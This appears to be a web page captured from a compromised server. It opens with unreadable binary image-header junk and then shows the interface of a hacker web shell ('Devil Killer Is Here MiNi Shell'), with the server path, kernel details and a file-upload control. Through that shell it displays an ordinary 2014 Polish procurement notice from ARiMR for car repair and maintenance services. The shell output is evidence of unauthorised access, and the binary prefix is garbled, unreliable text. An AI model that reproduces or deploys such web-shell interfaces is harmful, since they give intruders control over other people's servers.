JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141205/399306-N-2014.html

<p class="kh_header"><b>Warszawa: ŚWIADCZENIE USŁUG PRZEGLĄDÓW, NAPRAW I KONSERWACJI SAMOCHODÓW 
MARKI SKODA, DACIA,  SUZUKI I FIAT, EKSPLOATOWANYCH 
W MAZOWIECKIM ODDZIALE REGIONALNYM ARIMR</b><br>
<b>Numer ogłoszenia: 399306 - 2014; data zamieszczenia: 05.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa - Mazowiecki Oddział Regionalny , Al. Jana Pawła II 70, 00-175 Warszawa, woj. mazowieckie, tel. 22 5365705-06, faks 22 8602842.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja wykonawcza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG PRZEGLĄDÓW, NAPRAW I KONSERWACJI SAMOCHODÓW 
MARKI SKODA, DACIA,  SUZUKI I FIAT, EKSPLOATOWANYCH 
W MAZOWIECKIM ODDZIALE REGIONALNYM ARIMR.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający podzielił niniejsze zamówienie na cztery części, zwane w dalszej treści niniejszej SIWZ ZADANIAMI, na które dopuszcza składanie ofert częściowych, w rozumieniu art. 83 ust. 2 ustawy Pzp na dowolną liczbę wybranych zadań.
1.	Przedmiotem zamówienia jest świadczenie gwarancyjnych i pogwarancyjnych usług  przeglądów, napraw i konserwacji samochodów eksploatowanych w Mazowieckim Oddziale Regionalnym ARiMR, wynikających z awarii technicznych i przeglądów okresowych, zgodnych z ustalonymi przez producenta warunkami eksploatacji: 
Zadanie nr 1:  świadczenie usług gwarancyjnych przeglądów,  napraw i konserwacji samochodu marki SKODA realizowane  przez Autoryzowaną Stację Obsługi, 
Zadanie nr 2: świadczenie usług gwarancyjnych przeglądów, napraw i konserwacji samochodów marki DACIA realizowane  przez Autoryzowaną Stację Obsługi,
Zadanie nr 3:  świadczenie usług gwarancyjnych przeglądów, napraw i konserwacji samochodów marki SUZUKI realizowane  przez Autoryzowaną Stację Obsługi, 
Zadanie nr 4:  świadczenie usług pogwarancyjnych przeglądów, napraw i konserwacji samochodów różnych marek.
2.	Szczegółowy wykaz samochodów objętych zadaniami od nr 1 do nr 3 zawierają odpowiednio  Załączniki  nr 1.1, 1.2, 1.3  do wzoru umowy stanowiącego Załącznik nr 9A do SIWZ. Szczegółowy wykaz samochodów objętych zadaniem nr 4  zawiera  Załączniki  nr 1 do wzoru umowy stanowiącego Załącznik nr 9B  do SIWZ.
3.	Zakres usług obejmuje:
1) wykonywanie przeglądów okresowych, 
2) wykonywanie napraw wynikających z przeglądów,
3) wykonywanie napraw bieżących wynikłych w czasie eksploatacji, 
4) wykonywanie bieżących konserwacji,
5) diagnostykę w tym serwis ogumienia polegający na kontroli zużycia ogumienia, 
6) demontaż zużytych części, akcesoriów i materiałów wynikających z napraw oraz ich utylizację,
7) dostawę i w razie potrzeby wymianę niezbędnych części zamiennych, podzespołów, materiałów eksploatacyjnych i gumowych.
4.	Przeglądy będą wykonywane zgodnie z częstotliwością i zakresem wynikającym z /Warunków eksploatacji i przeglądów okresowych/ dla danego samochodu. 
5.	Naprawy będą wykonywane zgodnie z zakresem, każdorazowo określanym przez pracownika Zamawiającego, który dostarczy samochód do stacji obsługi. 
6.	Zamawiający wymaga, aby naprawy, przeglądy i konserwacje (oraz inne usługi wymienione w ust. 3 niniejszego rozdziału) wykonywane były pod jednym adresem 
w stacji obsługi, do której dojazd nie przekracza 10 km od siedziby Zamawiającego 
w Warszawie przy Al. Jana Pawła II 70, wg licznika tras optymalnych na stronie internetowej www.targeo.pl. 
7.	Zamawiający wymaga, aby usługi stanowiące przedmiot Zadania nr 1, nr 2 i nr 3 były wykonywane w autoryzowanej stacji obsługi -  stacji serwisowej Wykonawcy. Wykonawca składający ofertę na Zadanie nr 1, nr 2 i nr 3 musi posiadać autoryzację upoważniającą do wykonywania czynności obsługowych i naprawczych samochodów tej marki, której dotyczy oferta. 
8.	Szczegółowy zakres i warunki świadczenia usług przeglądów, napraw i konserwacji samochodów, eksploatowanych w Mazowieckim Oddziale Regionalnym ARiMR zostały określone dla zadań od nr 1 do nr 3 we wzorze umowy stanowiącym Załącznik nr 9A do SIWZ,  a dla zadania nr 4 we wzorze  umowy stanowiącym Załącznik nr 9B do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony poprzez złożenie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że  wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
1.	dla Zadania nr 1: 1 główną usługę  (tj. zrealizował co najmniej jedną umowę) polegającą na serwisowaniu dla zamawiającego  co najmniej 1 samochodu  SKODA w terminie nie krótszym niż 11 miesięcy oraz załączy dowody potwierdzające, że usługa ta została wykonana lub jest wykonywana należycie,
2.	dla Zadania nr 2: 1 główną usługę  (tj. zrealizował co najmniej jedną umowę) polegającą na serwisowaniu dla zamawiającego co najmniej 2 samochodów DACIA w terminie nie krótszym niż 11 miesięcy oraz załączy dowody potwierdzające, że usługa ta została wykonana lub jest wykonywana należycie,
3.	dla Zadania nr 3: 1 główną usługę  (tj. zrealizował co najmniej jedną umowę) polegającą na serwisowaniu dla zamawiającego co najmniej 2 samochodów SUZUKI w terminie nie krótszym niż 11 miesięcy oraz załączy dowody potwierdzające, że usługa ta została wykonana lub jest wykonywana należycie,
4.	dla Zadania nr 4: 2 główne usługi  (tj. zrealizował co najmniej dwie umowy) polegające na serwisowaniu dla zamawiającego  floty co najmniej 35 samochodów w terminie nie krótszym niż 11  miesięcy (każda z usług) oraz załączy dowody potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie.
(Pod pojęciem flota samochodowa Zamawiający rozumnie zespół pojazdów samochodowych użytkowanych w ramach jednego podmiotu  tj. - przedsiębiorstwo, firma, instytucja, itp.)
W przypadku  wykonywanych  usług (niezakończonych, ciągle trwających umów), Wykonawca musi wykazać należyte zrealizowanie usług w terminie nie krótszym niż 11 miesięcy w zakresie marki i liczby samochodów podanych wyżej - odpowiednio do zadania na które składa ofertę.
W przypadku Wykonawców ubiegających się o więcej niż jedno zadanie wymagane jest spełnianie warunków określonych w pkt. od 1 do 4 dla każdego zadania z osobna.
UWAGA:
Zamawiający na podstawie art. 22 ust. 5 ustawy Pzp uzna Wykonawcę za niezdolnego do wykonania zamówienia z należytą starannością w sytuacji stwierdzenia, że podczas realizacji jakiejkolwiek usługi polegającej na serwisowaniu samochodów na podstawie zawartej na co najmniej 11 m-cy  umowy doszło,  w okresie ostatnich 3 lat przed upływem terminu składania ofert, do rozwiązania albo wypowiedzenia tej umowy albo odstąpienia od takiej umowy, z powodu okoliczności, za które Wykonawca ponosi odpowiedzialność. W takim przypadku Zamawiający uzna, że Wykonawca nie spełnia warunku wiedzy 
i doświadczenia i wykluczy go z postępowania na podstawie art. 24 ust. 2 pkt 4 ustawy Pzp.
Powyższe zapisy dotyczą również podmiotów trzecich, jeżeli Wykonawca polega na wiedzy i doświadczeniu podmiotu trzeciego na zasadach, o których mowa w art. 26 ust. 2b ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym  zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jednym warsztatem do którego dojazd nie przekracza 10 km od siedziby Zamawiającego w Warszawie przy Al. Jana Pawła II 70 (wg licznika tras optymalnych na stronie internetowej www.targeo.pl) wyposażonym minimum w:
1.  dla Zadania nr 1: 
- autolawetę  (w celu realizacji zlecenia holowania),
- stanowisko naprawcze wyposażone w podnośnik umożliwiający podniesienie całego samochodu,
- stanowisko do kontroli zawieszenia i układu hamulcowego,
- stanowisko diagnostyczne do kontroli i regulacji układu jezdnego 
(w tym geometrii kół),
- stanowisko naprawcze zespołów napędowych (skrzynie biegów, mechanizmy różnicowe),
- stanowisko elektryka samochodowego,
- stanowisko wyposażone w specjalistyczne oprzyrządowanie diagnostyczne do diagnostyki silnika i części elektronicznych samochodów będących przedmiotem zamówienia, posiadające czytnik kodów usterek i umożliwiające modyfikacje ustawień oraz programowanie (np. nowego klucza do samochodu),
- urządzenie do napełniania i odgrzybiania klimatyzacji;
2. dla Zadania nr 2 i /lub Zadania nr 3: 
- autolawetę  (w celu realizacji zlecenia holowania),
- 2 stanowiska naprawcze, wyposażone w podnośniki umożliwiające podniesienie całego samochodu,
- stanowisko do kontroli zawieszenia i układu hamulcowego,
- stanowisko diagnostyczne do kontroli i regulacji układu jezdnego 
(w tym geometrii kół),
 - stanowisko naprawcze zespołów napędowych (skrzynie biegów, mechanizmy różnicowe),
- stanowisko elektryka samochodowego,
- stanowisko wyposażone w specjalistyczne oprzyrządowanie diagnostyczne do diagnostyki silnika i części elektronicznych samochodów będących przedmiotem zamówienia, posiadające czytnik kodów usterek i umożliwiające modyfikacje ustawień oraz programowanie (np. nowego klucza do samochodu),
- urządzenie do napełniania i odgrzybiania klimatyzacji;
3. dla Zadania nr 4: 
- autolawetę  (w celu realizacji zlecenia holowania),
- 10 stanowisk naprawczych, wyposażonych w podnośniki umożliwiające podniesienie całego samochodu,
- stanowisko do kontroli zawieszenia i układu hamulcowego,
- stanowisko diagnostyczne do kontroli i regulacji układu jezdnego 
(w tym geometrii kół),
 - stanowisko naprawcze zespołów napędowych (skrzynie biegów, mechanizmy różnicowe),
- 2 stanowiska elektryka samochodowego,
- stanowisko wyposażone w specjalistyczne oprzyrządowanie diagnostyczne do diagnostyki silnika i części elektronicznych samochodów będących przedmiotem zamówienia, posiadające czytnik kodów usterek i umożliwiające modyfikacje ustawień oraz programowanie (np. nowego klucza do samochodu),
- urządzenie do napełniania i odgrzybiania klimatyzacji;
W przypadku Wykonawców ubiegających się o więcej niż jedno zadanie wymagane jest wykazanie spełnienia warunku o największym zakresie spośród tych zadań, na które Wykonawca składa ofertę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia  zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje  osobami, które będą uczestniczyć w wykonaniu zamówienia, legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednimi do stanowisk jakie im zostaną powierzone - zgodnie z poniższym wykazem:
1. dla Zadania nr 1:  minimum dwiema osobami - 
- jedna  osoba pełniącą nadzór nad serwisem, która posiada co najmniej pięcioletnie  doświadczenie przy nadzorze nad naprawami samochodów osobowych i posiadająca co najmniej średnie wykształcenie o kierunku mechanicznym,
- co najmniej 1 osoba, które będzie uczestniczyć w wykonywaniu zamówienia posiadająca co najmniej trzyletnie doświadczenie zawodowe w naprawach samochodów osobowych w tym: 
- posiadająca przygotowanie zawodowe  o specjalności  naprawa skrzyni biegów, 
- posiadająca przygotowanie zawodowe o specjalności  elektryka samochodowa.
2. dla Zadania nr 2 i /lub Zadania nr 3:  minimum trzema osobami - 
- jedna  osoba pełniącą nadzór nad serwisem, która posiada co najmniej pięcioletnie  doświadczenie przy nadzorze nad naprawami samochodów osobowych i posiadająca co najmniej średnie wykształcenie o kierunku mechanicznym,
- co najmniej 2 osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadające co najmniej trzyletnie doświadczenie zawodowe w naprawach samochodów osobowych w tym: 
- minimum jedna z nich posiadająca przygotowanie zawodowe  
o specjalności  naprawa skrzyni biegów, 
- minimum jedna z nich posiadająca przygotowanie zawodowe 
o specjalności  elektryka samochodowa.

3. dla Zadania nr 4:  minimum sześcioma osobami -
- jedna  osoba pełniącą nadzór nad serwisem, która posiada co najmniej pięcioletnie  doświadczenie przy nadzorze nad naprawami samochodów osobowych i posiadająca co najmniej średnie wykształcenie o kierunku mechanicznym,
- co najmniej 5 osób, które będą uczestniczyć w wykonywaniu zamówienia posiadających co najmniej trzyletnie doświadczenie zawodowe w naprawach samochodów osobowych w tym: 
- minimum jedna z nich posiadająca przygotowanie zawodowe  
o specjalności  naprawa skrzyni biegów, 
- minimum dwie z nich posiadające przygotowanie zawodowe 
o specjalności  elektryka samochodowa.
W przypadku Wykonawców ubiegających się o więcej niż jedno zadanie wymagane jest wykazanie spełnienia warunku o największym zakresie spośród tych zadań, na które Wykonawca składa ofertę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony poprzez złożenie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca w wykazie usług zobowiązany jest  podać informacje o usługach polegających na serwisowaniu dla Zamawiającego  samochodów na podstawie zawartej na co najmniej 11 m-cy umowy niewykonanych lub wykonanych nienależycie, w okresie ostatnich 3 lat przed upływem terminu składania ofert, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi były wykonywane. UWAGA:
Jeżeli Wykonawca wykazując spełnienie warunków, o których mowa w rozdziale V ust. 1 pkt 1.2  SIWZ polega na wiedzy i doświadczeniu podmiotu trzeciego na zasadach, 
o których mowa w art. 26 ust. 2b ustawy Pzp, Wykonawca zobowiązany jest wskazać odpowiednio usługi wykonane oraz niewykonane lub wykonane nienależycie przez te podmioty - zgodnie  z wymaganiami określonymi w rozdziale V ust. 1 pkt 1.2  SIWZ;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w rozdziale V ust. 1 SIWZ polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów  w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda (w oryginale) pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia oraz dokumentów dotyczących  w szczególności:
a)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
2. Pełnomocnictwo osób podpisujących ofertę do reprezentowania Wykonawcy 
w postępowaniu, jeżeli nie wynika ono z odpisu z właściwego rejestru (oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza lub przez osobę udzielającą pełnomocnictwa), pełnomocnictwo w sposób jednoznaczny ma określać, do jakich czynności upoważniona jest osoba podpisująca ofertę. Nie dopuszcza się potwierdzenia za zgodność z oryginałem kopii pełnomocnictwa przez pełnomocnika, któremu zostało ono udzielone.
3. Jeżeli Wykonawca, wykazując spełnianie warunków,  o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy,  a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca zobowiązany jest złożyć w odniesieniu do tych podmiotów dokumenty w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy określone w pkt. III.4.2) lub odpowiednio pkt. III.4.3) niniejszego ogłoszenia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Upust od cen części zamiennych, podzespołów,materiałów eksploatacyjnych i gumowych - 50</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany zawartej umowy w trybie art. 144 ust. 1 ustawy Pzp w następujących przypadkach:
1) W przypadku korzystania przez Wykonawcę z podwykonawców, zmiana podwykonawcy będzie wymagała zmiany umowy w formie aneksu.
2) W przypadku zwiększenia lub zmniejszenia stawek podatku od towarów i usług dotyczących przedmiotu zamówienia, w wyniku zmiany Ustawy o podatku od towarów i usług, wynagrodzenie Wykonawcy za jedną roboczogodzinę może ulec odpowiedniemu zwiększeniu bądź zmniejszeniu. Zmiana ta wymaga formy aneksu.
2. Aneksu do umowy nie sporządza się w następujących przypadkach: 
a) zmiana w wykazie samochodów, o której mowa w § 2 ust. 3 umowy,
b) zmiana osób odpowiedzialnych za realizację umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa - Mazowiecki Oddział Regionalny, Al. Jana Pawła II 70, 00-175 Warszawa.</p>
